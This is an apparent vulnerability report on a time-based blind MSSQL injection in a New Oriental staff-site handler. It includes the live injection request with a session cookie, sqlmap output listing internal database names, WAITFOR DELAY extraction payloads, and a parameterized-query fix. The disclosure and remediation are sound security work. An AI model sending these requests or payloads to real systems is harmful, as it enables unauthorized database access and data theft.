MSSQL blind injection on a site in New Oriental
Injection point:
POST /p/Handler/ApiHandler.ashx HTTP/1.1
Content-Length: 87
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://xytest.staff.xdf.cn
Cookie: ASP.NET_SessionId=hkjmbgvondvsrk55zj1jxc45
Host: xytest.staff.xdf.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

OpType=IsValidate&studenType=3&studenVal=123456*%20--%20
The studenVal parameter is injectable (the * above is the sqlmap injection marker, followed by a -- comment). The back end is MSSQL and the only usable channel is time-based blind injection: the response carries no query output, so each bit of data is inferred from whether the server delays its reply.
sqlmap output (excerpt):

current user: 'shanqibin'
current database: 'NISmember0311'
back-end DBMS: Microsoft SQL Server 2008
[11:36:03] [INFO] fetching database names
[11:36:03] [INFO] fetching number of databases
[11:36:03] [INFO] resumed: 59
[11:36:03] [INFO] resumed: A2
[11:36:03] [INFO] resumed: aaa
[11:36:03] [INFO] resumed: AD_PASSPORT_DB
[11:36:03] [INFO] resumed: API
[11:36:03] [INFO] resumed: aspnetdb
[11:36:03] [INFO] resumed: BJ20140519
[11:36:03] [INFO] resumed: BJ20140520
[11:36:03] [INFO] resumed: BJ20140606
[11:36:03] [INFO] resumed: BJ201406061400
[11:36:03] [INFO] resumed: BJ20140714
[11:36:03] [INFO] resumed: BJ20140714_001
[11:36:03] [INFO] resumed: BJ20140915
[11:36:03] [INFO] resumed: bjnis_crm
[11:36:03] [INFO] resumed: BJTEST
[11:36:03] [INFO] resumed: BJTEST_DY
[11:36:03] [INFO] resumed: bushutest
[11:36:03] [INFO] resumed: CQ0825
[11:36:03] [INFO] resumed: CQNIS0519
[11:36:03] [INFO] resumed: CS0818
[11:36:03] [INFO] resumed: DevRequire
sqlmap counted 59 databases on the server; only the first part of the name list is shown above. The names (AD_PASSPORT_DB, bjnis_crm, aspnetdb and a series of dated BJ/CQ/CS databases) indicate that the injected account can see far more than the application's own database.
Solution:
Validate studenVal on the server side (a student number should match a strict allow-list such as digits only) and, more importantly, pass it to SQL Server through a parameterized command rather than concatenating it into the SQL string. Filtering alone is not a fix; parameterization is what removes the injection. Also review why the application's database login can enumerate every database on the instance and reduce its permissions to the NISmember0311 database it actually needs.
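To make the finding concrete, the following is an added example, not part of the original report and not taken from the application's source: what the ApiHandler.ashx query presumably looks like when studenVal is concatenated into it, the time-based probes that sqlmap substitutes at the * marker, and the parameterized form that removes the injection. The table name Students and the column names StudentType and StudentNo are assumptions; the report does not show the real query, so whether the value sits inside quotes is also an assumption (the probes below assume a quoted string and close it first).

```sql
-- Assumed shape of the vulnerable query (table/column names are hypothetical).
-- With studenVal=123456 the handler presumably runs something like:
SELECT COUNT(*) FROM Students WHERE StudentType = 3 AND StudentNo = '123456';

-- Time-based blind probe. sqlmap replaces the "*" in studenVal=123456*%20--%20
-- with a payload such as the one below. The response body is the same whether
-- the condition is true or false; only the 5-second delay leaks the answer.
-- The trailing -- comments out whatever followed the value in the original query.
SELECT COUNT(*) FROM Students WHERE StudentType = 3 AND StudentNo = '123456';
IF (SUBSTRING(SYSTEM_USER, 1, 1) = 's') WAITFOR DELAY '0:0:5' -- ';

-- Character-by-character extraction. Comparing the ASCII value with ">" lets
-- the client binary-search each character in about seven requests instead of
-- trying every possible byte; sqlmap does exactly this.
IF (ASCII(SUBSTRING(DB_NAME(), 1, 1)) > 77) WAITFOR DELAY '0:0:5' -- ';

-- Enumerating the other databases on the instance (the report shows 59):
IF ((SELECT COUNT(*) FROM sys.databases) > 50) WAITFOR DELAY '0:0:5' -- ';
IF (ASCII(SUBSTRING(
        (SELECT TOP 1 name FROM sys.databases
         WHERE name NOT IN (SELECT TOP 0 name FROM sys.databases)
         ORDER BY name), 1, 1)) > 77) WAITFOR DELAY '0:0:5' -- ';

-- Fix: never build the statement from the request value. sp_executesql with
-- typed parameters is the T-SQL equivalent of a parameterized ADO.NET command
-- (SqlCommand with Parameters.Add) that the .ashx handler should be using.
EXEC sp_executesql
    N'SELECT COUNT(*) FROM Students WHERE StudentType = @type AND StudentNo = @no',
    N'@type int, @no nvarchar(32)',
    @type = 3,
    @no = N'123456'';IF (1=1) WAITFOR DELAY ''0:0:5''--';
-- The value bound to @no is compared literally against StudentNo; the embedded
-- WAITFOR is data, not code, and the query returns immediately with COUNT(*) = 0.
```

The same WAITFOR DELAY probe, sent twice with a true and a false condition, is also the quickest way to re-test the endpoint after the fix: once studenVal is bound as a parameter, both requests must return in the same time.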